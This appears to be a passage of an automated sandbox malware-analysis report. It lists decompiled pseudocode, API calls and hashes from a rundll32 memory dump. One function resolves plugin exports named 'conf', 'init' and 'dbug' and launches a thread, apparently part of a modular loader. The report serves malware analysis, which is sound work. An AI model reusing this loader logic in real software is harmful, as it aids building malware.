                                                                                                • Part of subcall function 0425D980: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0425D9CB
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DCD8
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 0425DCE6
                                                                                              • LocalFree.KERNEL32(?), ref: 0425DD09
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DD0C
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0425DD23
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 3285080383-0
                                                                                              • Opcode ID: 03240056a5fb37bce586ec453b5f898d99449c099b90044829adaf39b7a434e3
                                                                                              • Instruction ID: 834b62c30cf667bb77e07366e28f59a6c4b25a2250c36ba1881eb08267caad43
                                                                                              • Opcode Fuzzy Hash: 03240056a5fb37bce586ec453b5f898d99449c099b90044829adaf39b7a434e3
                                                                                              • Instruction Fuzzy Hash: ACF0A9B5A14218BBD714BBB8AC49D6BBBACDF09251B104299FD05A3241DE35AD00C7F5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 35%
                                                                                              			E04272B90(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				intOrPtr _t10;
                                                                                              				intOrPtr* _t12;
                                                                                              				intOrPtr _t15;
                                                                                              				intOrPtr _t16;
                                                                                              				struct _CRITICAL_SECTION* _t17;
                                                                                              
                                                                                              				_t10 = _a8;
                                                                                              				_t12 = __ecx;
                                                                                              				_t15 = _a4;
                                                                                              				if(_t10 != 1) {
                                                                                              					if(_t10 == 2) {
                                                                                              						_t17 = _t15 + 0x54;
                                                                                              						EnterCriticalSection(_t17);
                                                                                              						_push(_a16);
                                                                                              						_push(_a12);
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t17 = _t15 + 0x54;
                                                                                              					EnterCriticalSection(_t17);
                                                                                              					_push(0);
                                                                                              					_push(5);
                                                                                              					L4:
                                                                                              					_t10 =  *((intOrPtr*)( *_t12 + 0xf0))(_t15);
                                                                                              					LeaveCriticalSection(_t17);
                                                                                              				}
                                                                                              				_t16 =  *((intOrPtr*)(_t15 + 0x88));
                                                                                              				 *((intOrPtr*)(_t15 + 0x88)) = 0xffffffff;
                                                                                              				__imp__#22(_t16, 1);
                                                                                              				__imp__#3(_t16);
                                                                                              				return _t10;
                                                                                              			}








                                                                                              0x04272b93
                                                                                              0x04272b97
                                                                                              0x04272b9b
                                                                                              0x04272ba1
                                                                                              0x04272bb6
                                                                                              0x04272bb8
                                                                                              0x04272bbc
                                                                                              0x04272bc2
                                                                                              0x04272bc5
                                                                                              0x00000000
                                                                                              0x04272bc5
                                                                                              0x04272ba3
                                                                                              0x04272ba3
                                                                                              0x04272ba7
                                                                                              0x04272bad
                                                                                              0x04272baf
                                                                                              0x04272bc8
                                                                                              0x04272bcd
                                                                                              0x04272bd4
                                                                                              0x04272bd4
                                                                                              0x04272bda
                                                                                              0x04272be3
                                                                                              0x04272bed
                                                                                              0x04272bf4
                                                                                              0x04272bfe

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04272BA7
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04272BBC
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04272BD4
                                                                                              • shutdown.WS2_32 ref: 04272BED
                                                                                              • closesocket.WS2_32(?), ref: 04272BF4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Enter$Leaveclosesocketshutdown
                                                                                              • String ID:
                                                                                              • API String ID: 3384241815-0
                                                                                              • Opcode ID: 65830482ca365740588ff82345b4355e01b8b3cc47482cfd1b23a507c11ea546
                                                                                              • Instruction ID: f701fab34705dda1ddd9060ae31273f1942c783ab8b7464beac7d98ab7a2f51f
                                                                                              • Opcode Fuzzy Hash: 65830482ca365740588ff82345b4355e01b8b3cc47482cfd1b23a507c11ea546
                                                                                              • Instruction Fuzzy Hash: 95018132300615ABCB115FE8AC4CBEAB768FF09321F114155F61593240CB747C56CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0428C0F1(intOrPtr* _a4) {
                                                                                              				intOrPtr _t6;
                                                                                              				intOrPtr* _t21;
                                                                                              				void* _t23;
                                                                                              				void* _t24;
                                                                                              				void* _t25;
                                                                                              				void* _t26;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t21 = _a4;
                                                                                              				if(_t21 != 0) {
                                                                                              					_t23 =  *_t21 -  *0x42a46f0; // 0x42a46e4
                                                                                              					if(_t23 != 0) {
                                                                                              						E042884AD(_t7);
                                                                                              					}
                                                                                              					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x42a46f4; // 0x42a78b0
                                                                                              					if(_t24 != 0) {
                                                                                              						E042884AD(_t8);
                                                                                              					}
                                                                                              					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x42a46f8; // 0x42a78b0
                                                                                              					if(_t25 != 0) {
                                                                                              						E042884AD(_t9);
                                                                                              					}
                                                                                              					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x42a4720; // 0x42a46e8
                                                                                              					if(_t26 != 0) {
                                                                                              						E042884AD(_t10);
                                                                                              					}
                                                                                              					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                              					_t27 = _t6 -  *0x42a4724; // 0x42a78b4
                                                                                              					if(_t27 != 0) {
                                                                                              						return E042884AD(_t6);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t6;
                                                                                              			}










                                                                                              0x0428c0f7
                                                                                              0x0428c0fc
                                                                                              0x0428c100
                                                                                              0x0428c106
                                                                                              0x0428c109
                                                                                              0x0428c10e
                                                                                              0x0428c112
                                                                                              0x0428c118
                                                                                              0x0428c11b
                                                                                              0x0428c120
                                                                                              0x0428c124
                                                                                              0x0428c12a
                                                                                              0x0428c12d
                                                                                              0x0428c132
                                                                                              0x0428c136
                                                                                              0x0428c13c
                                                                                              0x0428c13f
                                                                                              0x0428c144
                                                                                              0x0428c145
                                                                                              0x0428c148
                                                                                              0x0428c14e
                                                                                              0x00000000
                                                                                              0x0428c156
                                                                                              0x0428c14e
                                                                                              0x0428c159

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0428C109
                                                                                                • Part of subcall function 042884AD: HeapFree.KERNEL32(00000000,00000000,?,042812C5,00000001,00000001), ref: 042884C3
                                                                                                • Part of subcall function 042884AD: GetLastError.KERNEL32(D33DB39D,?,042812C5,00000001,00000001), ref: 042884D5
                                                                                              • _free.LIBCMT ref: 0428C11B
                                                                                              • _free.LIBCMT ref: 0428C12D
                                                                                              • _free.LIBCMT ref: 0428C13F
                                                                                              • _free.LIBCMT ref: 0428C151
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: cf1eb985703b01f7e559adb46ed961d3b776cfad103b615f2a710b20e268747e
                                                                                              • Instruction ID: 773f67ac00e86bdd7544f23f0254d5f4cc3bfd1ffe55b478eb0e6e2b544e743c
                                                                                              • Opcode Fuzzy Hash: cf1eb985703b01f7e559adb46ed961d3b776cfad103b615f2a710b20e268747e
                                                                                              • Instruction Fuzzy Hash: 00F06233B22241AB8620FA59F8C9D1E73D9EB547247A8480DF558DB5C0C735FC908EB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E04267BB0(void* __ebx, intOrPtr* __ecx, signed char _a4) {
                                                                                              				void* _t13;
                                                                                              				void* _t19;
                                                                                              				intOrPtr* _t23;
                                                                                              
                                                                                              				_t19 = __ebx;
                                                                                              				_t23 = __ecx;
                                                                                              				 *__ecx = 0x429f17c;
                                                                                              				InterlockedExchange(__ecx + 0xc, 0);
                                                                                              				WaitForSingleObject( *(_t23 + 0xe4), 0xffffffff);
                                                                                              				CloseHandle( *(_t23 + 0xe4));
                                                                                              				_t13 =  *(_t23 + 0x18);
                                                                                              				if(_t13 != 0) {
                                                                                              					CloseHandle(_t13);
                                                                                              				}
                                                                                              				E04252590(_t19, _t23 + 0x1c);
                                                                                              				 *_t23 = 0x429e8b0;
                                                                                              				CloseHandle( *(_t23 + 8));
                                                                                              				 *_t23 = 0x429e8c0;
                                                                                              				if((_a4 & 0x00000001) != 0) {
                                                                                              					_push(0xf8);
                                                                                              					E04275B47(_t23);
                                                                                              				}
                                                                                              				return _t23;
                                                                                              			}






                                                                                              0x04267bb0
                                                                                              0x04267bb4
                                                                                              0x04267bbc
                                                                                              0x04267bc3
                                                                                              0x04267bd1
                                                                                              0x04267be3
                                                                                              0x04267be5
                                                                                              0x04267bea
                                                                                              0x04267bed
                                                                                              0x04267bed
                                                                                              0x04267bf2
                                                                                              0x04267bfa
                                                                                              0x04267c00
                                                                                              0x04267c06
                                                                                              0x04267c0c
                                                                                              0x04267c0e
                                                                                              0x04267c14
                                                                                              0x04267c19
                                                                                              0x04267c21

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04267BC3
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04267BD1
                                                                                              • CloseHandle.KERNEL32(?), ref: 04267BE3
                                                                                              • CloseHandle.KERNEL32(?), ref: 04267BED
                                                                                              • CloseHandle.KERNEL32(?), ref: 04267C00
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1896077197-0
                                                                                              • Opcode ID: 2cdff629a6b77a045942ccc62af8b8690cfbb97b7af8360c2e9af1c053b8b50a
                                                                                              • Instruction ID: 1469ed3f78f9a9b6b75024d63e2995780f43297c21efcff90b2899d127e7b2f9
                                                                                              • Opcode Fuzzy Hash: 2cdff629a6b77a045942ccc62af8b8690cfbb97b7af8360c2e9af1c053b8b50a
                                                                                              • Instruction Fuzzy Hash: 1CF0A971314305ABD731AF69EC04F87FBE8EF54350F15492AF956921A0DA71B841CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0425AA50(intOrPtr* __ecx) {
                                                                                              				void* __esi;
                                                                                              				struct _CRITICAL_SECTION* _t10;
                                                                                              				struct _CRITICAL_SECTION* _t14;
                                                                                              				intOrPtr* _t18;
                                                                                              				struct _CRITICAL_SECTION* _t20;
                                                                                              
                                                                                              				_t18 = __ecx;
                                                                                              				 *__ecx = 0x429df78;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x24)) == 0) {
                                                                                              					L6:
                                                                                              					_t10 = _t18 + 0x28;
                                                                                              					DeleteCriticalSection(_t10);
                                                                                              					return _t10;
                                                                                              				} else {
                                                                                              					_t20 = __ecx + 0x28;
                                                                                              					EnterCriticalSection(_t20);
                                                                                              					if( *((intOrPtr*)(_t18 + 0x24)) != 0) {
                                                                                              						_t16 =  *((intOrPtr*)(_t18 + 0x40));
                                                                                              						 *((intOrPtr*)(_t18 + 0x24)) = 0;
                                                                                              						if( *((intOrPtr*)(_t18 + 0x40)) != 0) {
                                                                                              							E0426FE10(_t16, _t20);
                                                                                              							 *((intOrPtr*)(_t18 + 0x40)) = 0;
                                                                                              						}
                                                                                              						LeaveCriticalSection(_t20);
                                                                                              						 *((intOrPtr*)( *_t18 + 4))();
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						LeaveCriticalSection(_t20);
                                                                                              						_t14 = _t18 + 0x28;
                                                                                              						DeleteCriticalSection(_t14);
                                                                                              						return _t14;
                                                                                              					}
                                                                                              				}
                                                                                              			}








                                                                                              0x0425aa51
                                                                                              0x0425aa57
                                                                                              0x0425aa5d
                                                                                              0x0425aaad
                                                                                              0x0425aaad
                                                                                              0x0425aab1
                                                                                              0x0425aab8
                                                                                              0x0425aa5f
                                                                                              0x0425aa60
                                                                                              0x0425aa64
                                                                                              0x0425aa6e
                                                                                              0x0425aa84
                                                                                              0x0425aa87
                                                                                              0x0425aa90
                                                                                              0x0425aa92
                                                                                              0x0425aa97
                                                                                              0x0425aa97
                                                                                              0x0425aa9f
                                                                                              0x0425aaa9
                                                                                              0x00000000
                                                                                              0x0425aa70
                                                                                              0x0425aa71
                                                                                              0x0425aa78
                                                                                              0x0425aa7c
                                                                                              0x0425aa83
                                                                                              0x0425aa83
                                                                                              0x0425aa6e

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0425AA64
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0425AA71
                                                                                              • RtlDeleteCriticalSection.NTDLL(00000000), ref: 0425AA7C
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0425AA9F
                                                                                              • RtlDeleteCriticalSection.NTDLL(00000000), ref: 0425AAB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$DeleteLeave$Enter
                                                                                              • String ID:
                                                                                              • API String ID: 2043033798-0
                                                                                              • Opcode ID: 6fda2c1f5e6a43baab4c6fd1f22f3895fe42a0628301f31217325e2dc3d4ada2
                                                                                              • Instruction ID: be773f2ab7027860c8262126d2b05b1abf5a8b2a9db993f6e0561c37ff75d07a
                                                                                              • Opcode Fuzzy Hash: 6fda2c1f5e6a43baab4c6fd1f22f3895fe42a0628301f31217325e2dc3d4ada2
                                                                                              • Instruction Fuzzy Hash: D9F01971201612EBD704AB68F90CB99F7B8FF48315F140215E90682A00CB38F962CA94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04267C30(intOrPtr* __ecx) {
                                                                                              				void* _t11;
                                                                                              				int _t13;
                                                                                              				void* _t15;
                                                                                              				intOrPtr* _t19;
                                                                                              
                                                                                              				_t19 = __ecx;
                                                                                              				 *__ecx = 0x429f17c;
                                                                                              				InterlockedExchange(__ecx + 0xc, 0);
                                                                                              				WaitForSingleObject( *(_t19 + 0xe4), 0xffffffff);
                                                                                              				CloseHandle( *(_t19 + 0xe4));
                                                                                              				_t11 =  *(_t19 + 0x18);
                                                                                              				if(_t11 != 0) {
                                                                                              					CloseHandle(_t11);
                                                                                              				}
                                                                                              				E04252590(_t15, _t19 + 0x1c);
                                                                                              				 *_t19 = 0x429e8b0;
                                                                                              				_t13 = CloseHandle( *(_t19 + 8));
                                                                                              				 *_t19 = 0x429e8c0;
                                                                                              				return _t13;
                                                                                              			}







                                                                                              0x04267c31
                                                                                              0x04267c39
                                                                                              0x04267c40
                                                                                              0x04267c4e
                                                                                              0x04267c60
                                                                                              0x04267c62
                                                                                              0x04267c67
                                                                                              0x04267c6a
                                                                                              0x04267c6a
                                                                                              0x04267c6f
                                                                                              0x04267c77
                                                                                              0x04267c7d
                                                                                              0x04267c80
                                                                                              0x04267c87

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04267C40
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,042597AF,042A78D8,042A78D8,00000000), ref: 04267C4E
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042597AF,042A78D8,042A78D8,00000000), ref: 04267C60
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042597AF,042A78D8,042A78D8,00000000), ref: 04267C6A
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042597AF,042A78D8,042A78D8,00000000), ref: 04267C7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1896077197-0
                                                                                              • Opcode ID: 045fcd8533745aa4c0c6c61c22e94e2450b43d125c4ab0de79c6b99ed2b48b1b
                                                                                              • Instruction ID: 0ee87d0fc1006b8eb2bcc0efd4415f6caaaf3d3084d86699a98c85e3976a185c
                                                                                              • Opcode Fuzzy Hash: 045fcd8533745aa4c0c6c61c22e94e2450b43d125c4ab0de79c6b99ed2b48b1b
                                                                                              • Instruction Fuzzy Hash: E2F0FE75214701AFDB31AF69EC48A87BBE8EF44210B154E1EE596922A0DA70BC41CA50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0426E163
                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,0426DF5B,?,00000000,?,74CB4C30), ref: 0426E16F
                                                                                              • WSAResetEvent.WS2_32(?,?,?,?,?,?,?,?,0426DF5B,?,00000000,?,74CB4C30), ref: 0426E1AA
                                                                                                • Part of subcall function 04257AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 04257ADE
                                                                                                • Part of subcall function 04257AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0426FA53
                                                                                                • Part of subcall function 04257AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0426FA7B
                                                                                                • Part of subcall function 04257AC0: SetLastError.KERNEL32(0000139F,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                                                              • String ID:
                                                                                              • API String ID: 1862898202-3916222277
                                                                                              • Opcode ID: a8f8c91d60b63a168a7f43422d61776a8881057c9e164379fd57bc86be0f8586
                                                                                              • Instruction ID: 0e7adc00d1cbca97cc93a2175d10737a2409050b91300ed42db21f02907f0158
                                                                                              • Opcode Fuzzy Hash: a8f8c91d60b63a168a7f43422d61776a8881057c9e164379fd57bc86be0f8586
                                                                                              • Instruction Fuzzy Hash: 8441D4757207048BE7208F69D84876AF7F6AF84314F16051DD85783694EBB5F9858B80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0426F333
                                                                                              • WSAGetLastError.WS2_32(?), ref: 0426F33F
                                                                                              • WSAResetEvent.WS2_32(?), ref: 0426F37A
                                                                                                • Part of subcall function 04257AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 04257ADE
                                                                                                • Part of subcall function 04257AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0426FA53
                                                                                                • Part of subcall function 04257AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0426FA7B
                                                                                                • Part of subcall function 04257AC0: SetLastError.KERNEL32(0000139F,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                                                              • String ID:
                                                                                              • API String ID: 1862898202-3916222277
                                                                                              • Opcode ID: d3f7cdbca80131aaf553ca4c889a7e61bdfb0268b9fdd09f0d0e71751dfd1138
                                                                                              • Instruction ID: 7ac6a5e2b0674a90ac1dbed6f6669f648c4031594dc5a100bb4337a77b8c20e9
                                                                                              • Opcode Fuzzy Hash: d3f7cdbca80131aaf553ca4c889a7e61bdfb0268b9fdd09f0d0e71751dfd1138
                                                                                              • Instruction Fuzzy Hash: 8241AE717207058BEB20CE2DEA4876AF7F5AF84314F06051DDC5783690DBB5E885CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 70%
                                                                                              			E0425E420(void* __ebx, void* __ecx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void _t25;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t26;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t31;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t37;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t45;
                                                                                              				intOrPtr* _t46;
                                                                                              				void* _t48;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t50;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t58;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t59;
                                                                                              				void* _t60;
                                                                                              
                                                                                              				_t48 = __ebx;
                                                                                              				_t60 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x24)) == 0) {
                                                                                              					__eflags =  *(__ecx + 0x28);
                                                                                              					if( *(__ecx + 0x28) != 0) {
                                                                                              						goto L5;
                                                                                              					} else {
                                                                                              						__eflags =  *(__ecx + 0x2c);
                                                                                              						if(__eflags == 0) {
                                                                                              							_t45 = E04275B14(__ecx, __eflags, 0x14);
                                                                                              							_t45[1] = 0;
                                                                                              							 *_t45 = 0;
                                                                                              							 *(_t60 + 0x2c) = _t45;
                                                                                              						}
                                                                                              						__eflags =  *(_t60 + 0x14);
                                                                                              						if( *(_t60 + 0x14) == 0) {
                                                                                              							L23:
                                                                                              							__eflags = 0;
                                                                                              							return 0;
                                                                                              						} else {
                                                                                              							_t25 =  *_t60;
                                                                                              							__eflags =  *(_t25 + 0x24);
                                                                                              							if( *(_t25 + 0x24) <= 0) {
                                                                                              								goto L23;
                                                                                              							} else {
                                                                                              								_t26 =  *(_t60 + 0x2c);
                                                                                              								__eflags = _t26[1];
                                                                                              								if(_t26[1] == 0) {
                                                                                              									E0425E5C0(_t60);
                                                                                              									E0425D140( *(_t60 + 0x2c),  *(_t60 + 0x14),  *((intOrPtr*)( *_t60 + 0x24)));
                                                                                              									E0425E5C0(_t60);
                                                                                              								}
                                                                                              								_t50 =  *(_t60 + 0x2c);
                                                                                              								__eflags = _t50[1];
                                                                                              								if(_t50[1] == 0) {
                                                                                              									goto L23;
                                                                                              								} else {
                                                                                              									_t58 = E0425D260(_t50, "conf");
                                                                                              									__eflags = _t58;
                                                                                              									if(_t58 != 0) {
                                                                                              										_t37 = E042563D0(_t48, _t58, _t60) + 4;
                                                                                              										__eflags = _t37;
                                                                                              										 *_t58( *((intOrPtr*)(E042563D0(_t48, _t58, _t60) + 0x30)), _t37,  *((intOrPtr*)(E042563D0(_t48, _t58, _t60) + 0x28)));
                                                                                              									}
                                                                                              									_t59 = E0425D260( *(_t60 + 0x2c), "init");
                                                                                              									__eflags = _t59;
                                                                                              									if(_t59 != 0) {
                                                                                              										 *_t59(E042563D0(_t48, _t59, _t60));
                                                                                              									}
                                                                                              									__eflags =  *((intOrPtr*)(_t60 + 0x1c)) - 2;
                                                                                              									if( *((intOrPtr*)(_t60 + 0x1c)) == 2) {
                                                                                              										_t52 =  *(_t60 + 0x2c);
                                                                                              										__eflags =  *(_t60 + 0x2c);
                                                                                              										if( *(_t60 + 0x2c) != 0) {
                                                                                              											_t31 = E0425D260(_t52, "dbug");
                                                                                              											__eflags = _t31;
                                                                                              											if(_t31 != 0) {
                                                                                              												 *_t31(1);
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									 *((intOrPtr*)(_t60 + 0x20)) = CreateThread(0, 0, E0425E300, _t60, 0, 0);
                                                                                              									return 1;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					if( *((intOrPtr*)(__ecx + 0x1c)) == 2) {
                                                                                              						_t57 =  *(__ecx + 0x2c);
                                                                                              						if( *(__ecx + 0x2c) != 0) {
                                                                                              							_t46 = E0425D260(_t57, "dbug");
                                                                                              							if(_t46 != 0) {
                                                                                              								 *_t46(1);
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					L5:
                                                                                              					return 1;
                                                                                              				}
                                                                                              			}
















                                                                                              0x0425e420
                                                                                              0x0425e421
                                                                                              0x0425e428
                                                                                              0x0425e451
                                                                                              0x0425e455
                                                                                              0x00000000
                                                                                              0x0425e457
                                                                                              0x0425e457
                                                                                              0x0425e45b
                                                                                              0x0425e45f
                                                                                              0x0425e467
                                                                                              0x0425e46e
                                                                                              0x0425e474
                                                                                              0x0425e474
                                                                                              0x0425e477
                                                                                              0x0425e47b
                                                                                              0x0425e548
                                                                                              0x0425e548
                                                                                              0x0425e54b
                                                                                              0x0425e481
                                                                                              0x0425e481
                                                                                              0x0425e483
                                                                                              0x0425e487
                                                                                              0x00000000
                                                                                              0x0425e48d
                                                                                              0x0425e48d
                                                                                              0x0425e490
                                                                                              0x0425e494
                                                                                              0x0425e498
                                                                                              0x0425e4a8
                                                                                              0x0425e4af
                                                                                              0x0425e4af
                                                                                              0x0425e4b4
                                                                                              0x0425e4b7
                                                                                              0x0425e4bb
                                                                                              0x00000000
                                                                                              0x0425e4c1
                                                                                              0x0425e4cb
                                                                                              0x0425e4cd
                                                                                              0x0425e4cf
                                                                                              0x0425e4df
                                                                                              0x0425e4df
                                                                                              0x0425e4ec
                                                                                              0x0425e4ec
                                                                                              0x0425e4fb
                                                                                              0x0425e4fd
                                                                                              0x0425e4ff
                                                                                              0x0425e507
                                                                                              0x0425e507
                                                                                              0x0425e509
                                                                                              0x0425e50d
                                                                                              0x0425e50f
                                                                                              0x0425e512
                                                                                              0x0425e514
                                                                                              0x0425e51b
                                                                                              0x0425e520
                                                                                              0x0425e522
                                                                                              0x0425e526
                                                                                              0x0425e526
                                                                                              0x0425e522
                                                                                              0x0425e514
                                                                                              0x0425e53c
                                                                                              0x0425e546
                                                                                              0x0425e546
                                                                                              0x0425e4bb
                                                                                              0x0425e487
                                                                                              0x0425e47b
                                                                                              0x0425e42a
                                                                                              0x0425e42e
                                                                                              0x0425e430
                                                                                              0x0425e435
                                                                                              0x0425e43c
                                                                                              0x0425e443
                                                                                              0x0425e447
                                                                                              0x0425e447
                                                                                              0x0425e443
                                                                                              0x0425e435
                                                                                              0x0425e449
                                                                                              0x0425e450
                                                                                              0x0425e450

                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0425E300,?,00000000,00000000), ref: 0425E536
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
